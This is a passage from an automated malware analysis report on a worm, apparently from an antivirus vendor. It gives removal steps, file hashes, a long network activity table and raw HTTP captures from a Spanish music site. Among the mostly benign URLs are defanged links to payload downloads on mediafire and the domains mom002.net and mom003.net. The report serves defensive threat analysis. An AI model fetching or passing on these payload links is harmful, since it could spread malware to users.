%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\principal[1].swf (16315 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ga[2].js (1677 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@esmusicon[1].txt (3755 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ii_14[1].gif (176 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\mi.2papa[1].htm (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\i.b07[1].gif (762 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\i_15[1].gif (156 bytes) - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 39953 | 40960 | 4.02467 | 5a1e4cb8210fdbb00982f6d5eca8c55f |
.data | 45056 | 8448 | 4096 | 0 | 620f0b67a91f7f74151bc5be745b7110 |
.rsrc | 57344 | 2066 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 5
6d94103d83489a6635cdbcd9f054cfdb
d181a14d38ab2b06fc43bd44c06d7f84
abbf06cffc11ca3753afc685f606c4e5
2d1fc41ea48b9214976d9c6e2c4db70e
e221dbe5a8a24f9b46b4c4730c49df82
Network Activity
URLs
URL | IP |
---|---|
hxxp://api.wipmania.com/ | 68.64.170.190 |
hxxp://www.mediafire.com/download/bg4jdeppib94ych/empileque.hfg | 205.196.120.6 |
hxxp://download627.mediafire.com/wj53lrzxv7lg/bg4jdeppib94ych/empileque.hfg | 205.196.120.75 |
hxxp://www.mediafire.com/download/icv44fwz74gj29z/hgf678.hfg | 205.196.120.6 |
hxxp://download627.mediafire.com/lmpb2mr1rucg/icv44fwz74gj29z/hgf678.hfg | 205.196.120.75 |
hxxp://mi.2papa.us/ | 162.210.197.44 |
hxxp://mi.2papa.us/Poemas/ | 162.210.197.44 |
hxxp://mi.2papa.us/Estilos/CSS.Sitio.css | 162.210.197.44 |
hxxp://mi.2papa.us/Estilos/CSS.Panel.css | 162.210.197.44 |
hxxp://mi.2papa.us/Js/Principal.js | 162.210.197.44 |
hxxp://mi.2papa.us/Js/Funciones.js | 162.210.197.44 |
hxxp://mi.2papa.us/Js/swfobject.js | 162.210.197.44 |
hxxp://mi.2papa.us/Imagenes/i-2i.gif | 162.210.197.44 |
hxxp://mi.2papa.us/Imagenes/i.b07.gif | 162.210.197.44 |
hxxp://mi.2papa.us/principal.swf | 162.210.197.44 |
hxxp://a23.dscg10.akamai.net/2454.html?s=300x250 | |
hxxp://whos.amung.us/swidget/h20d2qja0b7p.gif | 67.202.94.94 |
hxxp://www-google-analytics.l.google.com/ga.js | |
hxxp://www-google-analytics.l.google.com/__utm.gif?utmwv=5.5.0&utms=1&utmn=1057111011&utmhn=esmusicon.com&utmcs=utf-8&utmsr=1276x846&utmvp=1256x842&utmsc=32-bit&utmul=en-us&utmje=1&utmfl=11.6 r602&utmdt=Musica Online&utmhid=941485037&utmr=-&utmp=/Poemas/&utmht=1398081328964&utmac=UA-36210330-1&utmcc=__utma=127640345.1684967166.1398081329.1398081329.1398081329.1;+__utmz=127640345.1398081329.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);&utmu=q~ | |
hxxp://mi.2papa.us/Imagenes/i_26.gif | 162.210.197.44 |
hxxp://widgets.amung.us/small/05/560.png | 173.192.200.70 |
hxxp://ds-any-world.ngd.ysm.yahoodns.net/st?ad_type=ad&ad_size=300x250§ion=5397210 | |
hxxp://a71.dscg10.akamai.net/pixel.gif?id=5397210&r=0.7235460356268475&u=http://esmusicon.com/Poemas/ | |
hxxp://a71.dscg10.akamai.net/pixel.gif?id=5397210&r=0.8804630965534756&u=http://esmusicon.com/Poemas/ | |
hxxp://mi.2papa.us/Imagenes/f.gif | 162.210.197.44 |
hxxp://a71.dscg10.akamai.net/pixel.gif?id=5397210&r=0.8022853591730279&u=http://esmusicon.com/Poemas/ | |
hxxp://ds-any-world.ngd.ysm.yahoodns.net/get-user-id?ver=2&s=5397210&ts=1398081449&sig=b42daf690844303b | |
hxxp://mi.2papa.us/Imagenes/i.f06.gif | 162.210.197.44 |
hxxp://mi.2papa.us/Imagenes/e_17.gif | 162.210.197.44 |
hxxp://ds-any-world.ngd.ysm.yahoodns.net/imp?Z=300x250&s=5397210&_salt=3369660399&B=10&H=&u=http://u.pub-fit.com/2454.html?s=300x250&M=5&r=0 | |
hxxp://mi.2papa.us/Imagenes/i_13.gif | 162.210.197.44 |
hxxp://mi.2papa.us/Imagenes/i_15.gif | 162.210.197.44 |
hxxp://mi.2papa.us/Imagenes/i_28.gif | 162.210.197.44 |
hxxp://mi.2papa.us/Imagenes/i_58.gif | 162.210.197.44 |
hxxp://mi.2papa.us/Imagenes/i-play.gif | 162.210.197.44 |
hxxp://mi.2papa.us/Imagenes/lyrics_ico.gif | 162.210.197.44 |
hxxp://mi.2papa.us/Imagenes/videos_ico.gif | 162.210.197.44 |
hxxp://a1174.g.akamai.net/atoms/c8/3b/51/0b/c83b510be812cec3ea3446015eb76621.gif | |
hxxp://mi.2papa.us/Imagenes/twitter.png | 162.210.197.44 |
hxxp://mi.2papa.us/Imagenes/facebook.png | 162.210.197.44 |
hxxp://mi.2papa.us/Imagenes/i_02.gif | 162.210.197.44 |
hxxp://mi.2papa.us/Imagenes/i_08.gif | 162.210.197.44 |
hxxp://mi.2papa.us/Imagenes/ii_13.gif | 162.210.197.44 |
hxxp://mi.2papa.us/Imagenes/-4524f.gif | 162.210.197.44 |
hxxp://mi.2papa.us/Imagenes/syij4.gif | 162.210.197.44 |
hxxp://mi.2papa.us/Imagenes/ii_14.gif | 162.210.197.44 |
hxxp://mi.2papa.us/Imagenes/vineta.gif | 162.210.197.44 |
hxxp://mi.2papa.us/Imagenes/fondo_icos.gif | 162.210.197.44 |
hxxp://mi.2papa.us/static.img/img/i-21.gif | 162.210.197.44 |
hxxp://mi.2papa.us/Imagenes/i_82.gif | 162.210.197.44 |
hxxp://mi.2papa.us/Imagenes/i_84.gif | 162.210.197.44 |
hxxp://mi.2papa.us/Imagenes/i_86.gif | 162.210.197.44 |
hxxp://a71.dscg10.akamai.net/pixel.gif?id=5397210&r=0.14030898417391835&u=http://esmusicon.com/ | |
hxxp://a71.dscg10.akamai.net/pixel.gif?id=5397210&r=0.8917821187154981&u=http://esmusicon.com/ | |
hxxp://ds-any-world.ngd.ysm.yahoodns.net/get-user-id?ver=2&s=5397210&ts=1398081463&sig=076f97ecda33a47a | |
hxxp://ds-any-world.ngd.ysm.yahoodns.net/imp?Z=300x250&s=5397210&_salt=2659402730&B=10&H=&u=http://u.pub-fit.com/2454.html?s=300x250&M=5&r=0 | |
hxxp://a71.dscg10.akamai.net/pixel.gif?id=5397210&r=0.0038873341277975703&u=http://esmusicon.com/ | |
hxxp://a1174.g.akamai.net/atoms/c5/f8/76/0e/c5f8760e7af5ff75c20de7295e421a6f.png | |
hxxp://ds-any-world.ngd.ysm.yahoodns.net/imp?Z=300x250&s=5397210&_salt=1531230313&B=10&H=&u=http://u.pub-fit.com/2454.html?s=300x250&M=5&r=0 | |
hxxp://ds-any-world.ngd.ysm.yahoodns.net/get-user-id?ver=2&s=5397210&ts=1398081464&sig=616b1a54b12efba8 | |
hxxp://a1174.g.akamai.net/atoms/fa/1b/6b/97/fa1b6b9794e5b240bbad703d9f4c9a12.png | |
hxxp://www-google-analytics.l.google.com/__utm.gif?utmwv=5.5.0&utms=2&utmn=1447428280&utmhn=esmusicon.com&utmcs=utf-8&utmsr=1276x846&utmvp=1256x842&utmsc=32-bit&utmul=en-us&utmje=1&utmfl=11.6 r602&utmdt=Musica Online&utmhid=200558968&utmr=-&utmp=/&utmht=1398081346167&utmac=UA-36210330-1&utmcc=__utma=127640345.1684967166.1398081329.1398081329.1398081329.1;+__utmz=127640345.1398081329.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);&utmu=q~ | |
hxxp://widgets.amung.us/small/05/567.png | 173.192.200.70 |
hxxp://esmusicon.com/Imagenes/i_58.gif | 162.210.197.44 |
hxxp://www.google-analytics.com/__utm.gif?utmwv=5.5.0&utms=2&utmn=1447428280&utmhn=esmusicon.com&utmcs=utf-8&utmsr=1276x846&utmvp=1256x842&utmsc=32-bit&utmul=en-us&utmje=1&utmfl=11.6 r602&utmdt=Musica Online&utmhid=200558968&utmr=-&utmp=/&utmht=1398081346167&utmac=UA-36210330-1&utmcc=__utma=127640345.1684967166.1398081329.1398081329.1398081329.1;+__utmz=127640345.1398081329.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);&utmu=q~ | 204.9.80.37 |
hxxp://px.pub-fit.com/pixel.gif?id=5397210&r=0.7235460356268475&u=http://esmusicon.com/Poemas/ | 204.95.26.185 |
hxxp://esmusicon.com/Imagenes/vineta.gif | 162.210.197.44 |
hxxp://www.google-analytics.com/ga.js | 204.9.80.37 |
hxxp://content.yieldmanager.edgesuite.net/atoms/c5/f8/76/0e/c5f8760e7af5ff75c20de7295e421a6f.png | 205.237.69.88 |
hxxp://px.pub-fit.com/pixel.gif?id=5397210&r=0.0038873341277975703&u=http://esmusicon.com/ | 204.95.26.185 |
hxxp://esmusicon.com/static.img/img/i-21.gif | 162.210.197.44 |
hxxp://ads.yahoo.com/get-user-id?ver=2&s=5397210&ts=1398081464&sig=616b1a54b12efba8 | 98.139.225.42 |
hxxp://content.yieldmanager.edgesuite.net/atoms/fa/1b/6b/97/fa1b6b9794e5b240bbad703d9f4c9a12.png | 205.237.69.88 |
hxxp://ads.yahoo.com/st?ad_type=ad&ad_size=300x250§ion=5397210 | 98.139.225.42 |
hxxp://esmusicon.com/Imagenes/facebook.png | 162.210.197.44 |
hxxp://esmusicon.com/principal.swf | 162.210.197.44 |
hxxp://content.yieldmanager.edgesuite.net/atoms/c8/3b/51/0b/c83b510be812cec3ea3446015eb76621.gif | 205.237.69.88 |
hxxp://esmusicon.com/Imagenes/i_26.gif | 162.210.197.44 |
hxxp://esmusicon.com/Imagenes/i.b07.gif | 162.210.197.44 |
hxxp://esmusicon.com/Imagenes/i_13.gif | 162.210.197.44 |
hxxp://esmusicon.com/Imagenes/lyrics_ico.gif | 162.210.197.44 |
hxxp://esmusicon.com/Imagenes/-4524f.gif | 162.210.197.44 |
hxxp://esmusicon.com/Js/Principal.js | 162.210.197.44 |
hxxp://u.pub-fit.com/2454.html?s=300x250 | 204.93.43.26 |
hxxp://ads.yahoo.com/imp?Z=300x250&s=5397210&_salt=2659402730&B=10&H=&u=http://u.pub-fit.com/2454.html?s=300x250&M=5&r=0 | 98.139.225.42 |
hxxp://esmusicon.com/Imagenes/i_28.gif | 162.210.197.44 |
hxxp://px.pub-fit.com/pixel.gif?id=5397210&r=0.8917821187154981&u=http://esmusicon.com/ | 204.95.26.185 |
hxxp://ads.yahoo.com/imp?Z=300x250&s=5397210&_salt=1531230313&B=10&H=&u=http://u.pub-fit.com/2454.html?s=300x250&M=5&r=0 | 98.139.225.42 |
hxxp://esmusicon.com/Imagenes/videos_ico.gif | 162.210.197.44 |
hxxp://esmusicon.com/Imagenes/i-play.gif | 162.210.197.44 |
hxxp://esmusicon.com/Imagenes/i.f06.gif | 162.210.197.44 |
hxxp://esmusicon.com/Imagenes/e_17.gif | 162.210.197.44 |
hxxp://esmusicon.com/Imagenes/i_84.gif | 162.210.197.44 |
hxxp://esmusicon.com/Imagenes/ii_14.gif | 162.210.197.44 |
hxxp://esmusicon.com/Imagenes/i_02.gif | 162.210.197.44 |
hxxp://esmusicon.com/Imagenes/i_86.gif | 162.210.197.44 |
hxxp://esmusicon.com/ | 162.210.197.44 |
hxxp://esmusicon.com/Imagenes/i_15.gif | 162.210.197.44 |
hxxp://esmusicon.com/Imagenes/ii_13.gif | 162.210.197.44 |
hxxp://ads.yahoo.com/imp?Z=300x250&s=5397210&_salt=3369660399&B=10&H=&u=http://u.pub-fit.com/2454.html?s=300x250&M=5&r=0 | 98.139.225.42 |
hxxp://esmusicon.com/Imagenes/fondo_icos.gif | 162.210.197.44 |
hxxp://esmusicon.com/Js/Funciones.js | 162.210.197.44 |
hxxp://esmusicon.com/Imagenes/i_82.gif | 162.210.197.44 |
hxxp://esmusicon.com/Js/swfobject.js | 162.210.197.44 |
hxxp://esmusicon.com/Poemas/ | 162.210.197.44 |
hxxp://esmusicon.com/Imagenes/f.gif | 162.210.197.44 |
hxxp://esmusicon.com/Estilos/CSS.Panel.css | 162.210.197.44 |
hxxp://px.pub-fit.com/pixel.gif?id=5397210&r=0.14030898417391835&u=http://esmusicon.com/ | 204.95.26.185 |
hxxp://ads.yahoo.com/get-user-id?ver=2&s=5397210&ts=1398081463&sig=076f97ecda33a47a | 98.139.225.42 |
hxxp://esmusicon.com/Estilos/CSS.Sitio.css | 162.210.197.44 |
hxxp://px.pub-fit.com/pixel.gif?id=5397210&r=0.8804630965534756&u=http://esmusicon.com/Poemas/ | 204.95.26.185 |
hxxp://www.google-analytics.com/__utm.gif?utmwv=5.5.0&utms=1&utmn=1057111011&utmhn=esmusicon.com&utmcs=utf-8&utmsr=1276x846&utmvp=1256x842&utmsc=32-bit&utmul=en-us&utmje=1&utmfl=11.6 r602&utmdt=Musica Online&utmhid=941485037&utmr=-&utmp=/Poemas/&utmht=1398081328964&utmac=UA-36210330-1&utmcc=__utma=127640345.1684967166.1398081329.1398081329.1398081329.1;+__utmz=127640345.1398081329.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);&utmu=q~ | 204.9.80.37 |
hxxp://esmusicon.com/Imagenes/i-2i.gif | 162.210.197.44 |
hxxp://ads.yahoo.com/get-user-id?ver=2&s=5397210&ts=1398081449&sig=b42daf690844303b | 98.139.225.42 |
hxxp://esmusicon.com/Imagenes/syij4.gif | 162.210.197.44 |
hxxp://esmusicon.com/Imagenes/twitter.png | 162.210.197.44 |
hxxp://px.pub-fit.com/pixel.gif?id=5397210&r=0.8022853591730279&u=http://esmusicon.com/Poemas/ | 204.95.26.185 |
hxxp://esmusicon.com/Imagenes/i_08.gif | 162.210.197.44 |
mom003.net | 37.0.123.87 |
mom002.net |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /ga.js HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.google-analytics.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 21 Apr 2014 02:16:24 GMT
Expires: Mon, 21 Apr 2014 14:16:24 GMT
Last-Modified: Thu, 10 Apr 2014 18:45:31 GMT
X-Content-Type-Options: nosniff
Content-Type: text/javascript
Vary: Accept-Encoding
Content-Encoding: gzip
Server: Golfe2
Content-Length: 15798
Age: 34865
Cache-Control: public, max-age=43200
Alternate-Protocol: 80:quic
...........}kw.:............Io@R...........,Y..4..N/......$[NR.s.Y.........h43v..@.....~...*....a$.|>>..G....,... ..:...<Hdz....$e..:........^1..H....BV...Y....t2..r.8..y...,...(r<...8W|....%DX.&..g4I.......$u.5..^GH...g,G=.....x.. .........W|.............. ...c.......2F.........%O.QO.....#.z.B..UtX;p....6...!V...9<K..A.awP'9hc.{H>....a...,..../:....Q.^.2H.}.pt:..x.c.A...CL...)4..........1.A.Y.od.}.....j,....f.&......Q...........w.8........~x'..<.*...`_.^r..>t!$ .j....q..N....V...M.).4` .r.......O..(.L..@. .>..v.C ......VJ._[[........~"..e...7-..C..y.*.K.I....Y.2!.R.a..i^R...-q..LG......:8.?.?.?R....>o....{<....[..!2o....V.....b..q7kE...'....n?.~...../..A4....vL3[.._....q.......].JG..\.......q....w.YV1..>..`..Q.cC.`..0...\u.:.'.....L.$.1.\O.7n..7.=.O.r'..d.,.y..Kh..,.J.<..na...$..b.X....T..y>OS.....Vxu...e......e.e.x ..[..K.d.D..*....1..Nm."x...I..e...........>....\c......J..&c..J.;@...Q.....j...<......y..J...#>.....>........t.....Y>..Yk..@e..v.Cf5....7.....(.......$\.R.......wz.I.......6..:A>..g..[..o../..M'.....y.6*..]H.5`i*...Q..O.%4T ...;.....#J.........xkk.&..^N../[......As.E....W....5.*MG....z......6.w......p..['Bg.~T..2....U..@@.`.u..T...Z.................Z....|.F.........M.&...k._v]T.M..,/....4.$.8..X.`...qm-\[.q..C..l...I|>>UJ.}.k.4."... e...v.......&.....jSm.....RH..m.9..si|kP .xVQ......-.V.v..j..z6.`\!.`.6`c73..2....y.......p...l..._..=o......k....<v ..'.bX7.e..R9.....Ym5..e.PE.zA.....y.. ...B"R...Qy.....g7..hp...fK./...O.c.,R....^3
<<
<<< skipped >>>
GET /__utm.gif?utmwv=5.5.0&utms=1&utmn=1057111011&utmhn=esmusicon.com&utmcs=utf-8&utmsr=1276x846&utmvp=1256x842&utmsc=32-bit&utmul=en-us&utmje=1&utmfl=11.6 r602&utmdt=Musica Online&utmhid=941485037&utmr=-&utmp=/Poemas/&utmht=1398081328964&utmac=UA-36210330-1&utmcc=__utma=127640345.1684967166.1398081329.1398081329.1398081329.1;+__utmz=127640345.1398081329.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);&utmu=q~ HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.google-analytics.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 19 Apr 2000 11:43:00 GMT
Last-Modified: Wed, 21 Jan 2004 19:51:30 GMT
X-Content-Type-Options: nosniff
Content-Type: image/gif
Date: Mon, 14 Apr 2014 17:12:35 GMT
Server: Golfe2
Content-Length: 35
Age: 585894
Cache-Control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Alternate-Protocol: 80:quic
GIF89a.............,...........D..;HTTP/1.1 200 OK..Pragma: no-cache..Expires: Wed, 19 Apr 2000 11:43:00 GMT..Last-Modified: Wed, 21 Jan 2004 19:51:30 GMT..X-Content-Type-Options: nosniff..Content-Type: image/gif..Date: Mon, 14 Apr 2014 17:12:35 GMT..Server: Golfe2..Content-Length: 35..Age: 585894..Cache-Control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate..Alternate-Protocol: 80:quic..GIF89a.............,...........D..;....
GET /__utm.gif?utmwv=5.5.0&utms=2&utmn=1447428280&utmhn=esmusicon.com&utmcs=utf-8&utmsr=1276x846&utmvp=1256x842&utmsc=32-bit&utmul=en-us&utmje=1&utmfl=11.6 r602&utmdt=Musica Online&utmhid=200558968&utmr=-&utmp=/&utmht=1398081346167&utmac=UA-36210330-1&utmcc=__utma=127640345.1684967166.1398081329.1398081329.1398081329.1;+__utmz=127640345.1398081329.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);&utmu=q~ HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.google-analytics.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 19 Apr 2000 11:43:00 GMT
Last-Modified: Wed, 21 Jan 2004 19:51:30 GMT
X-Content-Type-Options: nosniff
Content-Type: image/gif
Date: Mon, 14 Apr 2014 17:12:35 GMT
Server: Golfe2
Content-Length: 35
Age: 585911
Cache-Control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Alternate-Protocol: 80:quic
GIF89a.............,...........D..;HTTP/1.1 200 OK..Pragma: no-cache..Expires: Wed, 19 Apr 2000 11:43:00 GMT..Last-Modified: Wed, 21 Jan 2004 19:51:30 GMT..X-Content-Type-Options: nosniff..Content-Type: image/gif..Date: Mon, 14 Apr 2014 17:12:35 GMT..Server: Golfe2..Content-Length: 35..Age: 585911..Cache-Control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate..Alternate-Protocol: 80:quic..GIF89a.............,...........D..;..
GET /download/bg4jdeppib94ych/empileque.hfg HTTP/1.1
User-Agent: Mozilla/4.0
Host: VVV.mediafire.com
HTTP/1.1 302
Date: Mon, 21 Apr 2014 11:57:17 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Cache-control: no-cache
Expires: 0
Location: hXXp://download627.mediafire.com/wj53lrzxv7lg/bg4jdeppib94ych/empileque.hfg
Pragma: no-cache
Set-Cookie: ukey=d744vnx8vv7np87ybpq2qnf92ov8hquc; expires=Mon, 21-Mar-2016 11:57:17 GMT; path=/; domain=.mediafire.com; httponly
Server: MediaFire
Access-Control-Allow-Origin: *
0..
GET /Poemas/ HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: esmusicon.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Mon, 21 Apr 2014 11:57:26 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 130866
Last-Modified: Mon, 07 Apr 2014 17:00:48 GMT
Connection: keep-alive
ETag: "5342d9c0-1ff32"
Accept-Ranges: bytes
.<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="hXXp://VVV.w3.org/1999/xhtml">. <head>. <title>Musica Online</title>. <meta name='title' content="Musica Online">. <meta name='description' content="Musica Online tiene un gran repertorio de musica en linea, disfruta de la canciones que mas suenan en la disco, mira los videos y letras de tus canciones favoritas">. <meta name='keywords' content="MUSICA ONLINE,ESCUCHAR MUSICA, MUSICA EN LINEA">. <meta name="robots" content="index, follow"/>. <meta name="author" content="Musica Online"/>. <meta name="copyright" content="Musica Online 2012 Derechos Reservados"/>. <meta http-equiv="Content-Language" content="es"/>. <meta name="revisit" content="1 days"/>. <meta NAME="googlebot" content="index, follow" />. <base href="hXXp://esmusicon.com/" />. <META HTTP-EQUIV="Content-Type" content="text/html; charset=utf-8" />. <link href="./Estilos/CSS.Sitio.css" rel="stylesheet" type="text/css" />. <link href="./Estilos/CSS.Panel.css" rel="stylesheet" type="text/css" />. <script type="text/javascript" src="Js/Principal.js"></script&g
<<
<<< skipped >>>
GET /Js/Principal.js HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: esmusicon.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Mon, 21 Apr 2014 11:57:27 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 6765
Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT
Connection: keep-alive
ETag: "515a39e9-1a6d"
Accept-Ranges: bytes
// Coddigo Javascript By Andy (^_^)!.var actual;.var musicax;.var action;.var posps;.function Swf(path) { .var swf = navigator.appName.indexOf("Microsoft") != -1; .return (swf) ? window[path] : document[path];.}.function $(objeto){. return document.getElementById(objeto);..}.function valor(objeto){..return $(objeto).value;.}.function sug(e,obj){...var actualsug = e-1;..$(obj).focus();..$('f-' e).innerHTML = "<span class='fr-1' style='position:absolute'></span><span class='fr-2'>" sugerencias[actualsug] "</span>"; ...}.function ocu(e){. $('f-' e).innerHTML = ''; .}.function gen(val){for(i=0;i<val.length;i )if(val[i].checked) return val[i].value;}.function peticionXMLHttp() {. var peticion = false;. if (window.XMLHttpRequest) . { . peticion = new XMLHttpRequest(); . } . else . if (window.ActiveXObject) { . try { peticion = new ActiveXObject("Msxml2.XMLHTTP"); } . catch (e) {. try { peticion = new ActiveXObject("Microsoft.XMLHTTP"); } . catch (e) {}. }. }. . return peticion; . .}..function paginar(numpag){..var paginacion;..var anterior = numpag-1;..var siguiente = numpag 1;..var eltotal = $('listaArtistas').getElementsByTagName('li').length; ..var paginasentotal = Math.ceil(eltotal/40);..../* Enlace Adicional */..if(numpag <=paginasentotal-1)..paginacion = "<div style='margin-left:40px'><a class=t2 href='' onclick=\"paginar(" siguiente "); return false\" title='Más arti
<<
<<< skipped >>>
GET /Js/swfobject.js HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: esmusicon.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Mon, 21 Apr 2014 11:57:28 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 8880
Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT
Connection: keep-alive
ETag: "515a39e9-22b0"
Accept-Ranges: bytes
/**.. * SWFObject v2.0: Flash Player detection and embed - hXXp://blog.deconcept.com/swfobject/.. *.. * SWFObject is (c) 2006 Geoff Stearns and is released under the MIT License:.. * hXXp://VVV.opensource.org/licenses/mit-license.php.. *.. */..if(typeof deconcept == "undefined") var deconcept = new Object();..if(typeof deconcept.util == "undefined") deconcept.util = new Object();..if(typeof deconcept.SWFObjectUtil == "undefined") deconcept.SWFObjectUtil = new Object();..deconcept.SWFObject = function(swf, id, w, h, ver, c, quality, xiRedirectUrl, redirectUrl, detectKey) {...if (!document.getElementById) { return; }...this.DETECT_KEY = detectKey ? detectKey : 'detectflash';...this.skipDetect = deconcept.util.getRequestParameter(this.DETECT_KEY);...this.params = new Object();...this.variables = new Object();...this.attributes = new Array();...if(swf) { this.setAttribute('swf', swf); }...if(id) { this.setAttribute('id', id); }...if(w) { this.setAttribute('width', w); }...if(h) { this.setAttribute('height', h); }...if(ver) { this.setAttribute('version', new deconcept.PlayerVersion(ver.toString().split("."))); }...this.installedVer = deconcept.SWFObjectUtil.getPlayerVersion();...if (!window.opera && document.all && this.installedVer.major > 7) {....// only add the onunload cleanup if the Flash Player version supports External Interface and we are in IE....deconcept.SWFObject.doPrepUnload = true;...}...if(c) { this.addParam('bgcolor', c); }...var q = quality ? quality : 'high';...this.addParam('quality', q);...thi
<<
<<< skipped >>>
GET /Imagenes/i.b07.gif HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: esmusicon.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Mon, 21 Apr 2014 11:57:28 GMT
Content-Type: image/gif
Content-Length: 762
Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT
Connection: keep-alive
ETag: "515a39e9-2fa"
Accept-Ranges: bytes
GIF89a,......ONNgfdA@@===;;;???...CCC...........|......GGFJJI.........IIH...EED..}]][......lminnkrroYYW.........zyu==<.....~...RRRZZX__]..~...kjhppm...kki............XXWLLL.........///000NNNJJJMLL777444111KKKHHHEEE999FFF666...333........................................................................................................................................................................!.......,....,........%) .........!/.-3.........6.:........&<........@........;........A........D........B..........4F... F.......(.F.5.1........F.......@A@#....@.a.#....!.......(0a.......i...v.. h.!....7.......3!....@N#.h..`..J.'....a...8....oA.#..<.zu.T#..,0. ........u.T.CW...K....w{...........L......'.......#K.|.....3k.......C..M.t...S.^...k.EF..A.....s..}#..;....
GET /principal.swf HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: hXXp://esmusicon.com/Poemas/
x-flash-version: 11,6,602,168
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: esmusicon.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Mon, 21 Apr 2014 11:57:28 GMT
Content-Type: application/x-shockwave-flash
Content-Length: 116150
Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT
Connection: keep-alive
ETag: "515a39e9-1c5b6"
Accept-Ranges: bytes
